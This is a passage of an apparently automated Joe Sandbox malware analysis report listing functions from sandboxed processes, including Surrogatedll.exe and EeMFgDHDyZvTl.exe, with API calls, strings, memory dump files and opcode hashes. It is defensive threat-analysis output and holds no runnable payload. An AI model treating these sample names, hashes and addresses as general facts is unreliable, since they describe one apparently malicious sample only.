Part of subcall function 00226C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00226C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00230FFF

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: b5640c9a727f6cea8deaaf11c2525d13bad4befa0a47eb3b266d775e13b44f87
Instruction ID: 2b21b52f2b337968d64d3c7d2e47470b94543ddda95b7721770f8a9b08fd2455
Opcode Fuzzy Hash: b5640c9a727f6cea8deaaf11c2525d13bad4befa0a47eb3b266d775e13b44f87
Instruction Fuzzy Hash: BCD02B7251833036C71033247C0ED7F38048B22332F640715F838542F5CA3049F15699

Function 0022E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0022DA55,?), ref: 0022E2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0022DA55,?), ref: 0022E2B1

Strings

RTL, xrefs: 0022E2AB

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: ee7a98130fc65a36fd2e34558d5994791c3943e91a2a26cf32ae4667bdf57b5d
Instruction ID: 76047398a05e9e270e7245fc9bfca83c329c42768cda89f517da01d92901ffd3
Opcode Fuzzy Hash: ee7a98130fc65a36fd2e34558d5994791c3943e91a2a26cf32ae4667bdf57b5d
Instruction Fuzzy Hash: A2C0123125071066EA309B757C0DB47AA585B01BA2F05144CB541E91D1D6B5C55486A4

Function 0023E470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E467

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

p#, xrefs: 0023E470
z#, xrefs: 0023E461

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: p#$z#
API String ID: 1269201914-3950685266
Opcode ID: 8da94a736eb4f8efb510e956522a1dae150cba74ff96e8de2072f3a4e1b32044
Instruction ID: 9035e199b7d2dc97603ed19e779392cb9b01b206c5e80843ef1644f2521ab998
Opcode Fuzzy Hash: 8da94a736eb4f8efb510e956522a1dae150cba74ff96e8de2072f3a4e1b32044
Instruction Fuzzy Hash: 08B012C567E240FC3504E1141C02C37010DC0C5F51B31802EFD04C00C1E8808D3C0933

Function 0023E455 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E467

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

U#, xrefs: 0023E455
z#, xrefs: 0023E461

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: U#$z#
API String ID: 1269201914-481398727
Opcode ID: cb08b681611a182ea24d7a7ddf19125a37231feabeb011feaa83adac6f89bfe8
Instruction ID: 0e26e2444ccb9d55b96181a4047a026ccc1a97e2dcec4fbe61aee0f509c09ba2
Opcode Fuzzy Hash: cb08b681611a182ea24d7a7ddf19125a37231feabeb011feaa83adac6f89bfe8
Instruction Fuzzy Hash: 4DB012D5679200BC350461101D02C37020DC0C1F25B31C02EFB00D40D5E8804F3D0832

Analysis Process: Surrogatedll.exePID: 364, Parent PID: 4828COMMON

Execution Graph

Execution Coverage:	7.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD34530D78 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01523f3000a9ca07e14038c8e2ddfb98d96cf42ebc15d3d20ce33abb9ed0db15
Instruction ID: 3e042c7f2267ab4b51f98021af2351aa09badc9a4a4e3d8a2e4cde61a99190e4
Opcode Fuzzy Hash: 01523f3000a9ca07e14038c8e2ddfb98d96cf42ebc15d3d20ce33abb9ed0db15
Instruction Fuzzy Hash: 2E91F471B1CA898FE799EB6888793A97FF1FB96314F40007AD049D72D2CB785811C741

Function 00007FFD34929E81 Relevance: 1.8, APIs: 1, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryFullProcessImageNameA.KERNELBASE ref: 00007FFD3492A031

Memory Dump Source

Source File: 00000005.00000002.2210759071.00007FFD34920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34920000_Surrogatedll.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: d5961535468572ded680f6efbc0afe4dc19f81fbd841623836747bce60bd54f6
Instruction ID: 36ffd0e6a7cf7a13323ea6b0d87d73d7c780b19858a926bcae0489964db74d34
Opcode Fuzzy Hash: d5961535468572ded680f6efbc0afe4dc19f81fbd841623836747bce60bd54f6
Instruction Fuzzy Hash: E471A231608A8D4FDB68DF28D8997F977D1FB59311F00827EE84EC7292CA75A8458B81

Function 00007FFD345308D0 Relevance: 1.4, Strings: 1, Instructions: 165
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H6^4, xrefs: 00007FFD3453ABB5

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID: H6^4
API String ID: 0-1519301251
Opcode ID: d64dc539b0022936bd0e0cd9efa64203a6b474f6b95fdf91995637691eda3c80
Instruction ID: e00cd277ae15912636020041af04c2da2e1a7dc8eebc43a6c9b77da37774ef29
Opcode Fuzzy Hash: d64dc539b0022936bd0e0cd9efa64203a6b474f6b95fdf91995637691eda3c80
Instruction Fuzzy Hash: 43411522B0C5551FE719F7B8A0B66FA7B95EF99325B0445BBD14DC71A3CD18EC818280

Function 00007FFD34530960 Relevance: 1.4, Strings: 1, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H6^4, xrefs: 00007FFD3453ABB5

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID: H6^4
API String ID: 0-1519301251
Opcode ID: 2e42b36915d35798ef647238abc1ef28c34a77e321459db7673f1e9fac333260
Instruction ID: 20e3ac2e5d25341e104315ab3c6f7e356dda795e665c1f77ac15921827e2da68
Opcode Fuzzy Hash: 2e42b36915d35798ef647238abc1ef28c34a77e321459db7673f1e9fac333260
Instruction Fuzzy Hash: 81310822F1C9190FE668B3AC64BA6F967C6DF99325B1445BAE40DD72E3CD2CEC414284

Function 00007FFD34530998 Relevance: 1.3, Strings: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H6^4, xrefs: 00007FFD3453ABB5

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID: H6^4
API String ID: 0-1519301251
Opcode ID: 01d6dbcfecbf87cb666896c3cc9f27a1b09812e4ac03826dab6be9789d28be43
Instruction ID: a1b931c11fd246eda23ebaa4417cfb2393b45e5d51aae46fdd61d367a7f98f36
Opcode Fuzzy Hash: 01d6dbcfecbf87cb666896c3cc9f27a1b09812e4ac03826dab6be9789d28be43
Instruction Fuzzy Hash: 78210A21F189590FE798F66C54BA7B976C2EB99315B5004BAE40DC32E3DD6CDC414241

Function 00007FFD34530C25 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 159d3db1d7940255e156ccf7499aff1b5d84bd419a8afd603a1210ead1df706a
Instruction ID: b1489e1867818b747a6751db5e44aa862daf5954ddb4ba239c96281229970192
Opcode Fuzzy Hash: 159d3db1d7940255e156ccf7499aff1b5d84bd419a8afd603a1210ead1df706a
Instruction Fuzzy Hash: 7E315633F0D3499FE712A7A898B52ECBBA0EF42720F0445B7C188DA1C3CA3C68469741

Function 00007FFD34535ACC Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43a991ed9865aae6dad96ed7f8f8b2957eeefb5b60d78b177a2976896c02b6df
Instruction ID: ba25be5e8ca19469c4d567888e205cd9fc5dfef0c05550d2030ec4bfbc683166
Opcode Fuzzy Hash: 43a991ed9865aae6dad96ed7f8f8b2957eeefb5b60d78b177a2976896c02b6df
Instruction Fuzzy Hash: E6119031F1C50A8FEA9AEA1894B57BC33D1EF8A301F1415B5D94EC3196DD2CA845AA00

Function 00007FFD34535A47 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f0a3d975a69dc17d04916a880cabb2e0b8fbf997fa98c4a656e3b3b92adff93
Instruction ID: 3262203c402de0548364efb336524cb15d52ed33dc9f1d36f47d1e2e4717bfea
Opcode Fuzzy Hash: 8f0a3d975a69dc17d04916a880cabb2e0b8fbf997fa98c4a656e3b3b92adff93
Instruction Fuzzy Hash: 3F11C431F1CA0A8BE797AB1898B13BC7391FF4A701F5419B5D54EC3292EE3C69406641

Function 00007FFD345307D0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37cec95928fce5c8fb66c304d8ed62a8b68eac6775c6773515881f9f11623a9b
Instruction ID: 651260d178a729bfbca63dfee20b18c9a53aa25363884c2f07d7eb05feaeac59
Opcode Fuzzy Hash: 37cec95928fce5c8fb66c304d8ed62a8b68eac6775c6773515881f9f11623a9b
Instruction Fuzzy Hash: 0111E522F0C95A0FE799F72884B53B9B1C2EF8A354F0406B6E54DD32C6DD2CAC405781

Function 00007FFD345310BD Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76563f998f7daaed79892c881877925e0a11d5845997f4b043e3dd372ba0d01b
Instruction ID: cde98eee3056e4993ca4fd33cc45bf3a4ca68050d29aeffb49a486065da2463b
Opcode Fuzzy Hash: 76563f998f7daaed79892c881877925e0a11d5845997f4b043e3dd372ba0d01b
Instruction Fuzzy Hash: B101F211A8D6D10FD72A47B08CB16A27FE48F8331030901FAD185CB5A3C94D58868761

Function 00007FFD34530C38 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e392cf28bb7e3f4b322b0e5c81d2f7fd14836e7172cec2f0a72fee6d8cf92d42
Instruction ID: 62be95cd8248c8ce688e7b0ee08d6683f25d0f3ef1e5cb0321ffbbc3ad953241
Opcode Fuzzy Hash: e392cf28bb7e3f4b322b0e5c81d2f7fd14836e7172cec2f0a72fee6d8cf92d42
Instruction Fuzzy Hash: E611CE36E0D38D9FE712DB6888B12ADBBA0EF43B20F0549B7C184DB196D93856469780

Function 00007FFD34530C40 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e58a9afe0e0702b7f1cc065cbc0942b5436eeff201f41d285d4e71cfaa684008
Instruction ID: 4dafb34e32003b5e4b7e0e2406fb638b6049a6b770d60558c7800bcb49c270fc
Opcode Fuzzy Hash: e58a9afe0e0702b7f1cc065cbc0942b5436eeff201f41d285d4e71cfaa684008
Instruction Fuzzy Hash: 9F11CE36E0D38C9FE712DB6888B029DBBB0EF43710F0545B7C184DB196DA385A459780

Function 00007FFD3453586B Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02bc829a2119a2dea5a495bc8929cc23c5075a7862c879afe66a119df2518e97
Instruction ID: 7f1aecac44ad228c421c1cd6432ffb814e86c5c62f40b65ea4cf8033cfd62ab4
Opcode Fuzzy Hash: 02bc829a2119a2dea5a495bc8929cc23c5075a7862c879afe66a119df2518e97
Instruction Fuzzy Hash: F3110031E08A1C8FDB95DF08C494BA9B3F0EB69315F1445AAD44EE3290CA75AD85CF81

Function 00007FFD34530C48 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b114871f4938d615ec5e7e66fb9868bd94faf32ddbba44c2634598f332fc311
Instruction ID: 67725896cd2f4b69f09faf008190032a9b1e4c9e96158d6a9884c14618568adb
Opcode Fuzzy Hash: 9b114871f4938d615ec5e7e66fb9868bd94faf32ddbba44c2634598f332fc311
Instruction Fuzzy Hash: F601CC36E0D38C9FEB12DB6888A029DBFB0EF03710F1545F7C184DB296DA385A459781

Function 00007FFD34535A94 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87367cf5a9ec04028e753dccc507467d57cad249768860922cb061b81dfaa3c6
Instruction ID: 67e71f779de8bb20d59504cd4c7d00d0b5854e8c915cc915c63de1b9e85c0e49
Opcode Fuzzy Hash: 87367cf5a9ec04028e753dccc507467d57cad249768860922cb061b81dfaa3c6
Instruction Fuzzy Hash: 78F0A430E1851F8BEB9BEA04D8F13F87361FB15702F0015B9C54ED3196DE3C29859A40

Function 00007FFD34530C50 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a530a243af7c370f7b0c79354dff7202cc3e37e09f03903ec29ef7d38a02ba6
Instruction ID: dd58ad9a76cd18118995401d7fcfdc8957b101727cb24d016ae28d5e0f4b22f8
Opcode Fuzzy Hash: 8a530a243af7c370f7b0c79354dff7202cc3e37e09f03903ec29ef7d38a02ba6
Instruction Fuzzy Hash: A3015A36E0D3899FEB12DB6888A429DBFB0AF03710F1545E6C584DB296DA3C5A449741

Function 00007FFD345310F0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b76525d00762d859de67fe8936082c2e6d349dcab2bc734af2cb5f7c8f1902c2
Instruction ID: 0e4728777a0f24a5719cc2bb1b76e58a83a1b5c9533713fe13582605e9a637d3
Opcode Fuzzy Hash: b76525d00762d859de67fe8936082c2e6d349dcab2bc734af2cb5f7c8f1902c2
Instruction Fuzzy Hash: 8CE02625F0CC090AEB7CA67468B11F07280DB4631970501BAD00AD2282CC4D9C814281

Function 00007FFD34533B1F Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a6f6a1c85e16d92eda54594b5d82e52f021eb65ac43facd308aa87e06ee91a8
Instruction ID: c552f1e4cb5a1884cb135f5708e0acc1f0525f5bbdff62262fd366cc5cfdb771
Opcode Fuzzy Hash: 6a6f6a1c85e16d92eda54594b5d82e52f021eb65ac43facd308aa87e06ee91a8
Instruction Fuzzy Hash: 54F0E531F0910647FB555694C4B13E92320EB46320F2486B9EF5EC33C5CE2C6D41E795

Function 00007FFD34530B95 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c0ddbf3720e39f6b38fe7feb90305bca6f60561a0b7ddaa9c59d0b1193ae5b4
Instruction ID: c1d4fc84b14ee8b0d87355e807ed0f5f85030ff93000d28946dd74339906c484
Opcode Fuzzy Hash: 7c0ddbf3720e39f6b38fe7feb90305bca6f60561a0b7ddaa9c59d0b1193ae5b4
Instruction Fuzzy Hash: 9DD0A73062854E4FDA01F77CC89A4647BB0EB1B215FD510F1D049C7561C50948658B00

Function 00007FFD345344FF Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91bea591e53f8816b7f9e3e326063629c78cf9085cf0d1e9fd296f286a4a610f
Instruction ID: 783915b32ef83d5ac675471852d00a3017b23c0ad0050faf5c57a0c3dc0372d4
Opcode Fuzzy Hash: 91bea591e53f8816b7f9e3e326063629c78cf9085cf0d1e9fd296f286a4a610f
Instruction Fuzzy Hash: 38D0A700F1C81B47F3B693A858711BE08865F8172AF540534E50ED66C7DD5D6D1173EA

Function 00007FFD345306A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4a71e5b2110fd454efaf29df05a1d51e4324152f29b3885dc9d4fe0b37887c3
Instruction ID: 58b6cc6872bf046bcf10d38a9a560b0d55e496b068b8d2aa0a34f6b9ba87c45e
Opcode Fuzzy Hash: a4a71e5b2110fd454efaf29df05a1d51e4324152f29b3885dc9d4fe0b37887c3
Instruction Fuzzy Hash: 6CC08C03F0AB2F02B503B16E14F22ACA1005BC7A20FD00872C38CD00CE9C0D20C9A146

Function 00007FFD345312D8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
Instruction ID: 522dc680727eac57ac8e616aa9dd6536876d38ff622eb5c7bbb13d999e08e80c
Opcode Fuzzy Hash: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
Instruction Fuzzy Hash: 8FC04C349518098FC949EB29C8D5A1477E0FB1A215BD50090E409D7171E65ADCD5D781

Function 00007FFD345306C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c91385e51ffae7aacf19c1359f094a5c132148be1a8cd28b3fb5c26677793f9
Instruction ID: b51e43084398df51f0ed1416aa23dd7bd6c7266a559d8fd3a3f8767c4de17e59
Opcode Fuzzy Hash: 6c91385e51ffae7aacf19c1359f094a5c132148be1a8cd28b3fb5c26677793f9
Instruction Fuzzy Hash: 13B01201D5651F01A506317A08F21A470405B46104FC004B0D60CC0086984D10982243

Non-executed Functions

Function 00007FFD345309B0 Relevance: 5.2, Strings: 4, Instructions: 184COMMON

Download Yara Rule

Strings

c9, xrefs: 00007FFD34530B56
!k9, xrefs: 00007FFD34530B4E
"s9, xrefs: 00007FFD34530B46
#{9, xrefs: 00007FFD34530B3E

Memory Dump Source

Source File: 00000005.00000002.2208613580.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34530000_Surrogatedll.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 5dd024047612605454b2610f3041256dbbfa5dbea5b10c7b70120a89d2bbbf6c
Instruction ID: 97aa0046af307aada4ca8a3183f0ef1542cb47efc46d4edcd4cd3c5c1dd7b7da
Opcode Fuzzy Hash: 5dd024047612605454b2610f3041256dbbfa5dbea5b10c7b70120a89d2bbbf6c
Instruction Fuzzy Hash: 5D418317F0C1666BE92A37FD74715FE6B4C8FA5734B084677E18CD90E38D08A88682E5

Analysis Process: EeMFgDHDyZvTl.exePID: 1088, Parent PID: 3428COMMON

Executed Functions

Function 00007FFD3494E534 Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4573853148.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34940000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3102288f77ea54edb74b635d1a6c2001f03e1496e32cc8962b2a06e8443a1c28
Instruction ID: ea70ee989f2f53711f7f2e59f94d22cba1d46c9afc37dc38ecd7ea0afe6903d8
Opcode Fuzzy Hash: 3102288f77ea54edb74b635d1a6c2001f03e1496e32cc8962b2a06e8443a1c28
Instruction Fuzzy Hash: 6FD17F31B189194FEB98EB28C8B66B973D2EB9A310F44017ED50ED33D6DD2CAC429751

Function 00007FFD34940B39 Relevance: .4, Instructions: 427COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4573853148.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd34940000_EeMFgDHDyZvTl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b874531fb912b79f841c088c91f02f0562d0f618bb1ebc0dad989f1eda73a63
Instruction ID: bba40aad6398baddea9d4727f7ca5768e7b4f4fe11b3d36617760173a555fbf7
Opcode Fuzzy Hash: 0b874531fb912b79f841c088c91f02f0562d0f618bb1ebc0dad989f1eda73a63
Instruction Fuzzy Hash: 45D13931B0C9498FE7A8DA2CC4A56B937D1FF4A310B0502BDD54DC7396DD2CB81A9791

